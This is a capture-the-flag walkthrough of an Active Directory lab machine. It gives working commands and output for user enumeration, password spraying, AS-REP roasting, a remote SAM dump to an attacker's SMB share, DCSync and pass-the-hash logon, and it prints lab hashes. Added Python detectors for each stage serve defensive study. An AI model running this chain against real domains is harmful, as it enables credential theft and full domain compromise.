Target: https://hackmyvm.eu/machines/machine.php?vm=DC02
Author: [josemlwdf](https://hackmyvm.eu/profile/?user=josemlwdf)
Difficulty: ⭐️⭐️⭐️⭐️
Topics: AS-REP Roasting, BloodHound analysis, SAM dumping, DCSync, kerbrute brute-forcing
```bash
nmap -sC -sV 192.168.56.126 -p- -T4
```

```
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-20 11:36 CST
Stats: 0:02:17 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 77.78% done; ETC: 11:39 (0:00:14 remaining)
Stats: 0:02:22 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 77.78% done; ETC: 11:39 (0:00:15 remaining)
Nmap scan report for 192.168.56.126
Host is up (0.00022s latency).
Not shown: 65517 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-11-20 02:57:08Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49674/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49687/tcp open  msrpc         Microsoft Windows RPC
49707/tcp open  msrpc         Microsoft Windows RPC
MAC Address: 08:00:27:F5:A3:8F (Oracle VirtualBox virtual NIC)
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
|_nbstat: NetBIOS name: DC01, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:f5:a3:8f (Oracle VirtualBox virtual NIC)
|_clock-skew: -40m50s
| smb2-time:
|   date: 2024-11-20T02:58:01
|_  start_date: N/A
```
```
192.168.56.126:389 open
192.168.56.126:53 open
192.168.56.126:135 open
192.168.56.126:445 open
192.168.56.126:464 open
192.168.56.126:88 open
192.168.56.126:593 open
192.168.56.126:636 open
192.168.56.126:139 open
192.168.56.126:3268 open
192.168.56.126:3269 open
192.168.56.126:5985 open
192.168.56.126:9389 open
192.168.56.126:49667 open
192.168.56.126:49664 open
192.168.56.126:49674 open
192.168.56.126:49687 open
192.168.56.126:49707 open
[*] alive ports len is: 18
start vulscan
[*] NetBios 192.168.56.126 [+] DC:SOUPEDECODE\DC01
[*] WebTitle http://192.168.56.126:5985 code:404 len:315 title:Not Found
[*] NetInfo
[*]192.168.56.126
   [->]DC01
   [->]192.168.56.126
```
Domain name: SOUPEDECODE

First add the hosts entries:

```bash
vim /etc/hosts
```

```
192.168.56.126 SOUPEDECODE.LOCAL DC01.SOUPEDECODE.LOCAL
```

The target has ports 139 and 445 open, so we use smbmap to check whether anonymous or guest login is allowed.
```bash
smbmap -u anonymous -H SOUPEDECODE.LOCAL
```
```
[*] Detected 1 hosts serving SMB
[*] Established 0 SMB session(s)
```
The target does not allow SMB null sessions or anonymous LDAP binds.

We therefore use a list of common usernames against Kerberos authentication to enumerate the users that may exist in the domain:
```bash
kerbrute userenum -d SOUPEDECODE.LOCAL -t 50 --dc DC01.SOUPEDECODE.LOCAL /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -o valid_user.txt
```
```
Version: v1.0.3 (9dad6e1) - 11/20/24 - Ronnie Flathers @ropnop

2024/11/20 12:10:37 > Using KDC(s):
2024/11/20 12:10:37 > DC01.SOUPEDECODE.LOCAL:88

2024/11/20 12:10:37 > [+] VALID USERNAME: admin@SOUPEDECODE.LOCAL
2024/11/20 12:10:37 > [+] VALID USERNAME: charlie@SOUPEDECODE.LOCAL
2024/11/20 12:10:38 > [+] VALID USERNAME: Charlie@SOUPEDECODE.LOCAL
2024/11/20 12:10:38 > [+] VALID USERNAME: administrator@SOUPEDECODE.LOCAL
2024/11/20 12:10:38 > [+] VALID USERNAME: Admin@SOUPEDECODE.LOCAL
2024/11/20 12:10:38 > [+] VALID USERNAME: Administrator@SOUPEDECODE.LOCAL
2024/11/20 12:10:38 > [+] VALID USERNAME: CHARLIE@SOUPEDECODE.LOCAL
2024/11/20 12:10:40 > [+] VALID USERNAME: ADMIN@SOUPEDECODE.LOCAL
2024/11/20 12:11:04 > [+] VALID USERNAME: wreed11@SOUPEDECODE.LOCAL
2024/11/20 12:12:02 > [+] VALID USERNAME: printserver@SOUPEDECODE.LOCAL
2024/11/20 12:12:57 > [+] VALID USERNAME: kleo2@SOUPEDECODE.LOCAL
2024/11/20 12:14:00 > [+] VALID USERNAME: dc01@SOUPEDECODE.LOCAL
2024/11/20 12:14:46 > [+] VALID USERNAME: aDmin@SOUPEDECODE.LOCAL
2024/11/20 12:15:08 > [+] VALID USERNAME: ChArLiE@SOUPEDECODE.LOCAL
2024/11/20 12:15:09 > [+] VALID USERNAME: CHarlie@SOUPEDECODE.LOCAL
2024/11/20 12:15:20 > Done! Tested 8295455 usernames (15 valid) in 282.207 seconds
```
-d   domain name
-t   number of threads
--dc domain controller to query
-o   write the results to a file
Extract the usernames from the output, lowercase them and deduplicate:

```bash
# extract the usernames and convert them all to lowercase
cat valid_user.txt | grep @ | cut -d " " -f8 | cut -d '@' -f1 | while read a; do echo "$a" | tr '[:upper:]' '[:lower:]' >> valid_user_lowercase.txt; done
# deduplicate
cat valid_user_lowercase.txt | sort -u > valid_usernames.txt
```
We now have the user list valid_usernames.txt. Next, try a password spray using each username as its own password.

--no-bruteforce        do not try every username/password combination; pair each username only with the password on the same line
--continue-on-success  keep running after a valid credential is found instead of stopping at the first hit
```bash
crackmapexec smb SOUPEDECODE.LOCAL -u valid_usernames.txt -p valid_usernames.txt --no-bruteforce --continue-on-success
```

```
SMB  SOUPEDECODE.LOCAL  445  DC01  [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB  SOUPEDECODE.LOCAL  445  DC01  [-] SOUPEDECODE.LOCAL\admin:admin STATUS_LOGON_FAILURE
SMB  SOUPEDECODE.LOCAL  445  DC01  [-] SOUPEDECODE.LOCAL\administrator:administrator STATUS_LOGON_FAILURE
SMB  SOUPEDECODE.LOCAL  445  DC01  [+] SOUPEDECODE.LOCAL\charlie:charlie
SMB  SOUPEDECODE.LOCAL  445  DC01  [-] SOUPEDECODE.LOCAL\dc01:dc01 STATUS_LOGON_FAILURE
SMB  SOUPEDECODE.LOCAL  445  DC01  [-] SOUPEDECODE.LOCAL\kleo2:kleo2 STATUS_LOGON_FAILURE
SMB  SOUPEDECODE.LOCAL  445  DC01  [-] SOUPEDECODE.LOCAL\printserver:printserver STATUS_LOGON_FAILURE
SMB  SOUPEDECODE.LOCAL  445  DC01  [-] SOUPEDECODE.LOCAL\wreed11:wreed11 STATUS_LOGON_FAILURE
```
We obtained one user's password:

```
charlie:charlie
```

With this account, brute-force RIDs and extract the list of domain users (the file written in the first command is the one read in the second):

```bash
crackmapexec smb SOUPEDECODE.LOCAL -u 'charlie' -p 'charlie' --rid-brute > rid_bruteforce.txt
cat rid_bruteforce.txt | grep 'SidTypeUser' | cut -d '\' -f2 | cut -d ' ' -f1 > domain_users.txt
```
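Both steps above (kerbrute userenum against the KDC, then a one-password-per-user spray over SMB) leave a characteristic trail on the domain controller. The Python script below is an added example, not part of the original writeup or of any tool it uses: it runs two detection rules over constructed Security-log records (event IDs 4768, 4625 and 4771 are the real Windows event IDs; the sample records, source hosts, timestamps and thresholds are made up). Username enumeration shows up as a burst of 4768 requests with result code 0x6 (KDC_ERR_C_PRINCIPAL_UNKNOWN) from one source; a spray shows up as failed logons against many distinct accounts from one source while each account fails only once, which is exactly the pattern that stays under per-account lockout thresholds.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample Security events (not taken from the writeup's target). Fields mimic
# what a SIEM extracts:
#   4768 = Kerberos TGT request; result 0x6 (KDC_ERR_C_PRINCIPAL_UNKNOWN) means the
#          account does not exist, which is what a userenum wordlist run produces.
#   4625 = NTLM logon failure; 0xC000006A = wrong password (the SMB spray above).
#   4771 = Kerberos pre-authentication failure; 0x18 = wrong password.
BASE = datetime(2024, 11, 20, 12, 10, 37)

def _ev(offset_s, event_id, account, ip, status):
    return {"time": (BASE + timedelta(seconds=offset_s)).isoformat(),
            "id": event_id, "account": account, "ip": ip, "status": status}

SAMPLE_EVENTS = (
    # enumeration burst: eight non-existent usernames from one host within seconds
    [_ev(i, 4768, name, "192.168.56.6", "0x6")
     for i, name in enumerate(["aaron", "abby", "abel", "abigail", "adam", "adrian", "agnes", "alan"])]
    # a valid user is found: that TGT request succeeds and is not counted
    + [_ev(1, 4768, "charlie", "192.168.56.6", "0x0")]
    # spray: one wrong password each against six different accounts within seconds
    + [_ev(1200 + i, 4625, name, "192.168.56.6", "0xC000006A")
       for i, name in enumerate(["admin", "administrator", "dc01", "kleo2", "printserver", "wreed11"])]
    # benign noise: one user mistypes their own password twice from another host
    + [_ev(1260, 4771, "jdoe", "192.168.56.50", "0x18"),
       _ev(1280, 4771, "jdoe", "192.168.56.50", "0x18")]
)

def _window_hits(by_key, window, score):
    """Slide a time window over each key's events (sorted by time) and keep the best
    score that met the rule's threshold; score() returns None when it did not."""
    hits = {}
    for key, evs in by_key.items():
        evs.sort(key=lambda e: datetime.fromisoformat(e["time"]))
        start = 0
        for end in range(len(evs)):
            while (datetime.fromisoformat(evs[end]["time"])
                   - datetime.fromisoformat(evs[start]["time"])) > window:
                start += 1
            s = score(evs[start:end + 1])
            if s is not None:
                hits[key] = max(hits.get(key, 0), s)
    return hits

def detect_enumeration(events, window=timedelta(minutes=5), min_unknown=5):
    """Sources that requested TGTs for >= min_unknown non-existent principals within the window."""
    by_ip = defaultdict(list)
    for e in events:
        if e["id"] == 4768 and e["status"].lower() == "0x6":
            by_ip[e["ip"]].append(e)
    return _window_hits(by_ip, window,
                        lambda evs: len(evs) if len(evs) >= min_unknown else None)

def detect_spray(events, window=timedelta(minutes=10), min_accounts=5):
    """Sources with failed logons against >= min_accounts distinct accounts within the window.
    Counting distinct accounts per source, not failures per account, is what catches a spray."""
    by_ip = defaultdict(list)
    for e in events:
        if e["id"] in (4625, 4771) and e["status"] != "0x0":
            by_ip[e["ip"]].append(e)

    def distinct_accounts(evs):
        n = len({x["account"].lower() for x in evs})
        return n if n >= min_accounts else None

    return _window_hits(by_ip, window, distinct_accounts)

if __name__ == "__main__":
    print("username enumeration:", detect_enumeration(SAMPLE_EVENTS))
    print("password spraying:   ", detect_spray(SAMPLE_EVENTS))
```

Run it directly to print both findings; the benign host with two failures for a single account triggers neither rule. Note that 4768 failures with result 0x6 only appear if "Audit Kerberos Authentication Service" is enabled on the domain controllers.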
Use impacket-GetNPUsers to enumerate users with Kerberos pre-authentication disabled; these are the accounts that can be targeted with AS-REP Roasting.

A user without pre-authentication can request a TGT with an AS-REQ that carries no encrypted timestamp, so the domain controller answers with an AS-REP for anyone who asks. An attacker can capture that AS-REP and crack the password offline.

Before that, align our clock with the domain's time:

```bash
timedatectl set-ntp off
rdate -n 192.168.56.126
```
```bash
impacket-GetNPUsers SOUPEDECODE.LOCAL/ -dc-ip 192.168.56.126 -no-pass -usersfile domain_users.txt | grep -v '[-]'
```

```
$krb5asrep$23$zximena448@SOUPEDECODE.LOCAL:9db51e4c05b23c0562b08157315f848a$f5b6d13bb1d2dcd2c0f56218183d0c552a69ccde25bea3b39dc4f82002b6a42d05b8753a81230a65f62f6b091be00057d2a2d106a9d9c4e3ac99a70b3071cd822bb3536bf51cb9f94b3b7217594b2fff7baf7a4b195651753b7c9b87148f424f9255eafea3565df4dde77b2abeaa649f4b2b6877044936c66419aec3db1b4a4e066df447176c63f01de9a9ef41b8b846f3ba870a4237e50560dbbeb84d4b0f82afca660940e70ac6693bf7c82ffcba601384a110498dd4b7e5f7b4ca761830c8ff04b18dea82abf62c62bd00ab9948561b4ff09daf864b94745170d4239da474d8d016f72bb84ec0efa4147dc7eb6e4c327b8e9b0308
```
We obtained the AS-REP hash for the user zximena448. Its encrypted part is protected with a key derived from the user's password, so we can try to crack it with hashcat to recover that password:

```bash
hashcat -a 0 -m 18200 as-rep.txt rockyou.txt
```

The password cracks to internet.
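On the defender's side, the attribute GetNPUsers is keying on is the DONT_REQ_PREAUTH bit (0x400000) of userAccountControl. The script below is an added example, not from the writeup or from Impacket: it audits a user export for enabled accounts with that bit set, and it splits the $krb5asrep$ line format shown above into its fields, which makes visible why the hashcat mode is 18200 (etype 23 is RC4-HMAC). The user list is constructed (names borrowed from the writeup, flag values invented); in the sample hash the user, realm and checksum are the writeup's, while the encrypted part is a shortened constructed placeholder.

```python
import re

# userAccountControl bits (Microsoft-defined values)
UAC_ACCOUNTDISABLE     = 0x0002
UAC_NORMAL_ACCOUNT     = 0x0200
UAC_DONT_EXPIRE_PASSWD = 0x10000
UAC_DONT_REQ_PREAUTH   = 0x400000   # "Do not require Kerberos preauthentication"

# Constructed directory export: account names come from the writeup, the flag values
# are invented to show each branch of the audit.
SAMPLE_USERS = [
    {"sAMAccountName": "charlie",    "userAccountControl": UAC_NORMAL_ACCOUNT},
    {"sAMAccountName": "zximena448", "userAccountControl": UAC_NORMAL_ACCOUNT | UAC_DONT_REQ_PREAUTH},
    {"sAMAccountName": "svc_legacy", "userAccountControl": UAC_NORMAL_ACCOUNT | UAC_DONT_REQ_PREAUTH | UAC_ACCOUNTDISABLE},
    {"sAMAccountName": "krbtgt",     "userAccountControl": UAC_NORMAL_ACCOUNT | UAC_ACCOUNTDISABLE},
]

def roastable_accounts(users):
    """Enabled accounts with DONT_REQ_PREAUTH set: the set GetNPUsers can obtain AS-REPs for.
    Disabled accounts are skipped because the KDC rejects them before issuing any AS-REP."""
    return sorted(u["sAMAccountName"] for u in users
                  if u["userAccountControl"] & UAC_DONT_REQ_PREAUTH
                  and not u["userAccountControl"] & UAC_ACCOUNTDISABLE)

# hashcat mode 18200 line layout: $krb5asrep$<etype>$<user>@<REALM>:<checksum>$<enc-part>
_ASREP_RE = re.compile(r"^\$krb5asrep\$(\d+)\$([^@]+)@([^:]+):([0-9a-fA-F]{32})\$([0-9a-fA-F]+)$")

_ETYPE_NAMES = {23: "rc4-hmac", 17: "aes128-cts-hmac-sha1-96", 18: "aes256-cts-hmac-sha1-96"}

def parse_asrep_hash(line):
    """Split a GetNPUsers/hashcat AS-REP line into its fields.
    etype 23 (RC4-HMAC, keyed directly by the NT hash) is what mode 18200 cracks; an AES
    etype uses a PBKDF2-derived key and is far slower to crack with a different mode."""
    m = _ASREP_RE.match(line.strip())
    if not m:
        raise ValueError("not an AS-REP hash line")
    etype, user, realm, checksum, enc = m.groups()
    return {"etype": int(etype), "cipher": _ETYPE_NAMES.get(int(etype), "unknown"),
            "user": user, "realm": realm, "checksum": checksum.lower(),
            "enc_part_bytes": len(enc) // 2}

# User, realm and checksum are the writeup's; the encrypted part is a constructed placeholder.
SAMPLE_HASH = ("$krb5asrep$23$zximena448@SOUPEDECODE.LOCAL:9db51e4c05b23c0562b08157315f848a$"
               + "f5b6d13b" * 8)

if __name__ == "__main__":
    print("accounts exposed to AS-REP Roasting:", roastable_accounts(SAMPLE_USERS))
    print("hash fields:", parse_asrep_hash(SAMPLE_HASH))
```

Running it reports zximena448 as the only exposed account: svc_legacy has the same flag but is disabled. The remediation the audit points at is clearing the "Do not require Kerberos preauthentication" option, and, where an account must keep it, making sure the account is not allowed RC4 (msDS-SupportedEncryptionTypes) and has a long random password.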
Use zximena448's credentials to collect information about the domain.

Before that, set up a fake DNS server with dnschef and point BloodHound at it for name resolution while it runs; this lets it collect more information:

```bash
dnschef --fakeip 192.168.56.126
```

Collect the domain data:

```bash
bloodhound-python -u 'zximena448' -p 'internet' -ns 127.0.0.1 -d SOUPEDECODE.LOCAL -dc DC01.SOUPEDECODE.LOCAL --zip
```
Start neo4j, then analyse the collected archive in the BloodHound GUI by uploading the JSON files from the zip.

Locate our current user, zximena448. We see that zximena448 is a member of the Backup Operators group.

That group can back up the SAM database, which stores credentials. The user cannot log on to DC01 directly, so we back the database up remotely with Impacket: first start an SMB server on the attacking machine, then have the domain controller write the SAM backup to that share so it ends up on our attacking machine.
Start an SMB server in the current directory and send it to the background:

```bash
impacket-smbserver -smb2support share . &
```

```
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
```

With the SMB server up, use impacket-reg to back up the SAM registry hives remotely to the share (192.168.56.6 is the attacking machine):

```bash
impacket-reg -dc-ip 192.168.56.126 SOUPEDECODE.LOCAL/zximena448:internet@192.168.56.126 backup -o '\\192.168.56.6\share'
```
Then dump the contents of the SAM backup with impacket-secretsdump:

```bash
impacket-secretsdump -sam SAM.save -system SYSTEM.save -security SECURITY.save LOCAL
```

```
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Target system bootKey: 0x0c7ad5e1334e081c4dfecd5d77cc2fc6
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC:plain_password_hex:30d0ca9ed25597562013a17fe07bcc24a8063aa89da83698090451d4f9c01497d07956aee9f517760560ca9817836b8aaa5a0706c8e3d358c8248d48c5c42388c80af03a4c70c4e75a55066bbc2ea68747c758fe4e41e80a4a6a2d9c9bd68c94ebc3e8fbbc89d06985163c8de5071d80a1c55c33a83b3c006c123eae6c0e5706412271e110ae7fd8e39482ae539bb6f9441b2340dbcd8fb1593198b778f09317469e8dd572d14e42031997298f68ec498f5bb6a2c295cd7c9dbadfcb88f74e7e0cb5b25b39ca43d970cb8c1b5b506c316438d7de4c8d0d6b1ac2f2985ef7eb35e0951cff704cae50ac45eff772a29f9e
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:f984aa0aa19fcb118d6b20506ce75c6d
[*] DPAPI_SYSTEM
dpapi_machinekey:0x829d1c0e3b8fdffdc9c86535eac96158d8841cf4
dpapi_userkey:0x4813ee82e68a3bf9fec7813e867b42628ccd9503
[*] NL$KM
 0000   44 C5 ED CE F5 0E BF 0C  15 63 8B 8D 2F A3 06 8F   D........c../...
 0010   62 4D CA D9 55 20 44 41  75 55 3E 85 82 06 21 14   bM..U DAuU>...!.
 0020   8E FA A1 77 0A 9C 0D A4  9A 96 44 7C FC 89 63 91   ...w......D|..c.
 0030   69 02 53 95 1F ED 0E 77  B5 24 17 BE 6E 80 A9 91   i.S....w.$..n...
NL$KM:44c5edcef50ebf0c15638b8d2fa3068f624dcad95520444175553e85820621148efaa1770a9c0da49a96447cfc896391690253951fed0e77b52417be6e80a991
[*] Cleaning up...
```
It contains the Administrator user's hash:

```
Administrator:500:aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634:::
```

Check whether this hash can be used to log in:

```bash
crackmapexec smb DC01.SOUPEDECODE.LOCAL -u 'Administrator' -H 209c6174da490caeb422f3fa5a7ae634
```

```
SMB  SOUPEDECODE.LOCAL  445  DC01  [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB  SOUPEDECODE.LOCAL  445  DC01  [-] SOUPEDECODE.LOCAL\Administrator:209c6174da490caeb422f3fa5a7ae634 STATUS_LOGON_FAILURE
```

The logon fails. No matter: we also have the machine account hash ($MACHINE.ACC):

```
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:f984aa0aa19fcb118d6b20506ce75c6d
```
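Why did the Administrator hash from the SAM backup fail against the domain? The local SAM of a domain controller holds the DSRM (Directory Services Restore Mode) administrator, a local account separate from the domain Administrator stored in NTDS.dit, so its NT hash is not valid for a network logon to the domain. The Python example below is added here and is not part of the original writeup: it parses secretsdump hash lines, flags accounts whose NT hash is the well-known hash of an empty password, checks whether any real LM hashes are still stored, and compares the local Administrator hash above with the domain Administrator hash that the DCSync step further down produces. The only inputs are the hash lines printed on this page.

```python
# Well-known constants: the "empty" LM value means LM hashes are not stored (normal on
# modern Windows); the "empty" NT value is the NT hash of a blank password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Hash lines exactly as printed in the writeup: the local SAM of DC01 (from the reg backup)
# and the Administrator line from the NTDS dump obtained later via DCSync.
SAM_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
"""
NTDS_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8982babd4da89d33210779a6c5b078bd:::
"""

def parse_secretsdump(text):
    """Parse user:rid:lmhash:nthash::: lines; status lines and other secret types are skipped."""
    entries = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        entries.append({"user": parts[0], "rid": int(parts[1]),
                        "lm": parts[2].lower(), "nt": parts[3].lower()})
    return entries

def blank_password_accounts(entries):
    """Accounts whose NT hash is the hash of the empty string (no password set)."""
    return sorted(e["user"] for e in entries if e["nt"] == EMPTY_NT)

def lm_hashes_stored(entries):
    """True if any account still stores a real LM hash, a legacy weakness worth flagging."""
    return any(e["lm"] != EMPTY_LM for e in entries)

def compare_account(sam_entries, ntds_entries, user="Administrator"):
    """Compare one account's NT hash between the local SAM and the domain database.
    On a DC the SAM 'Administrator' is the DSRM account, so a mismatch with NTDS is expected."""
    sam = {e["user"].lower(): e for e in sam_entries}
    ntds = {e["user"].lower(): e for e in ntds_entries}
    a, b = sam.get(user.lower()), ntds.get(user.lower())
    return {"user": user,
            "sam_nt": a["nt"] if a else None,
            "ntds_nt": b["nt"] if b else None,
            "same_secret": bool(a and b and a["nt"] == b["nt"])}

if __name__ == "__main__":
    sam = parse_secretsdump(SAM_DUMP)
    print("blank passwords:", blank_password_accounts(sam))
    print("LM hashes stored:", lm_hashes_stored(sam))
    print(compare_account(sam, parse_secretsdump(NTDS_DUMP)))
```

Guest and DefaultAccount show the empty NT hash because they are disabled built-ins with no password, not because anyone can log on with a blank password; the comparison confirms the two Administrator hashes are different secrets, which is why the first logon attempt failed. The machine account hash from LSA secrets is a different matter entirely, as the next step shows.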
Before spraying this hash, we need the list of all machine accounts in the domain. It can be taken from the computers.json file in the archive BloodHound collected:

```bash
unzip 20241120140128_bloodhound.zip
cat 20241120140128_computers.json | jq . | grep samaccountname | cut -d '"' -f4 > machines.txt
```

Spray the hash with CrackMapExec:

```bash
crackmapexec smb DC01.SOUPEDECODE.LOCAL -u machines.txt -H f984aa0aa19fcb118d6b20506ce75c6d | grep -v '[-]'
```

```
SMB  SOUPEDECODE.LOCAL  445  DC01  [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB  SOUPEDECODE.LOCAL  445  DC01  [+] SOUPEDECODE.LOCAL\DC01$:f984aa0aa19fcb118d6b20506ce75c6d
```

The spray shows that this hash belongs to the machine account DC01$.
Analyse DC01$ in the BloodHound GUI. DC01$ is a member of the Administrators group, and with that membership we can run a DCSync attack against the domain controller. Members of Enterprise Admins can also perform DCSync, as can any principal that has been granted the replication synchronization rights.
```bash
crackmapexec smb DC01.SOUPEDECODE.LOCAL -u 'DC01$' -H f984aa0aa19fcb118d6b20506ce75c6d --ntds > ntds.txt
```

--ntds dumps the contents of NTDS.dit, the Active Directory database on a Windows domain controller. It holds every domain account, including password hashes, Kerberos keys and other sensitive material.

The Administrator's hash:

```
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8982babd4da89d33210779a6c5b078bd:::
```
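DCSync is visible on the domain controller as Event 4662 with Access Mask 0x100 (Control Access) and the replication control-access right GUIDs listed in Properties. The usual detection rule exempts domain controller machine accounts, because DCs replicate with each other all the time, and that is exactly what the step above slips past: the request came from DC01$ itself. The Python example below is added here and is not part of the writeup; it keeps the machine-account exemption only when the request also originates from that DC's known address. The three GUIDs are Microsoft's well-known values for the replication rights; the DC inventory, the second controller DC02$, the source addresses and the events are constructed, and the events are assumed to have been joined by the SIEM with the 4624 logon that supplies the source IP (a raw 4662 carries no network address).

```python
# Well-known control-access right GUIDs that appear in Event 4662 "Properties" during replication
REPL_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
CONTROL_ACCESS = 0x100  # Access Mask value 4662 reports for extended rights

# Constructed inventory of domain controllers (account -> address). DC01 is from the
# writeup; DC02 is invented so that legitimate DC-to-DC replication can be shown.
DC_INVENTORY = {"DC01$": "192.168.56.126", "DC02$": "192.168.56.127"}

# Constructed 4662 events, assumed already joined by the SIEM with the 4624 logon that
# produced them so that a source address ("ip") is available.
SAMPLE_EVENTS = [
    # normal replication: a DC account, coming from that DC's own address
    {"id": 4662, "subject": "DC02$", "ip": "192.168.56.127", "access_mask": 0x100,
     "properties": ["{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}", "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"]},
    # the case above: DC01$ credentials replayed from a workstation address
    {"id": 4662, "subject": "DC01$", "ip": "192.168.56.6", "access_mask": 0x100,
     "properties": ["{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}", "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"]},
    # a user account exercising a replication right
    {"id": 4662, "subject": "zximena448", "ip": "192.168.56.6", "access_mask": 0x100,
     "properties": ["{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"]},
    # unrelated directory access (placeholder GUID, different access mask): must not alert
    {"id": 4662, "subject": "jdoe", "ip": "192.168.56.50", "access_mask": 0x10,
     "properties": ["{00000000-0000-0000-0000-000000000000}"]},
]

def _normalize(guid):
    return guid.strip("{}").lower()

def detect_dcsync(events, dc_inventory=DC_INVENTORY):
    """Flag replication-right access that did not come from a known DC at its known address."""
    alerts = []
    for e in events:
        if e["id"] != 4662 or e["access_mask"] != CONTROL_ACCESS:
            continue
        rights = [REPL_RIGHTS[g] for g in map(_normalize, e["properties"]) if g in REPL_RIGHTS]
        if not rights:
            continue
        subject, ip = e["subject"], e["ip"]
        if dc_inventory.get(subject) == ip:
            continue  # a DC replicating from its own address: expected traffic
        reason = ("DC machine account used from a non-DC address" if subject in dc_inventory
                  else "non-DC principal requested replication")
        alerts.append({"subject": subject, "ip": ip, "rights": rights, "reason": reason})
    return alerts

if __name__ == "__main__":
    for a in detect_dcsync(SAMPLE_EVENTS):
        print(f"{a['subject']} from {a['ip']}: {a['reason']} ({', '.join(a['rights'])})")
```

The inventory lookup is the part that matters: a rule that only asks "is the subject a DC account?" is silent for the DC01$ case. Keeping the list of DC accounts and addresses current (and alerting when a DC account authenticates from anywhere else, 4624 alone is enough for that) closes the gap the machine-account hash opened here.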
We have now dumped the credentials of every user in the domain. Use the Administrator hash to log on to the domain controller over WinRM and read the flags:
```bash
evil-winrm -i 192.168.56.126 -u Administrator -H 8982babd4da89d33210779a6c5b078bd
```

```
*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\zximena448\Desktop\user.txt
2fe79eb0e02ecd4dd2833cfcbbdb504c
*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\Administrator\Desktop\root.txt
d41d8cd98f00b204e9800998ecf8427e
```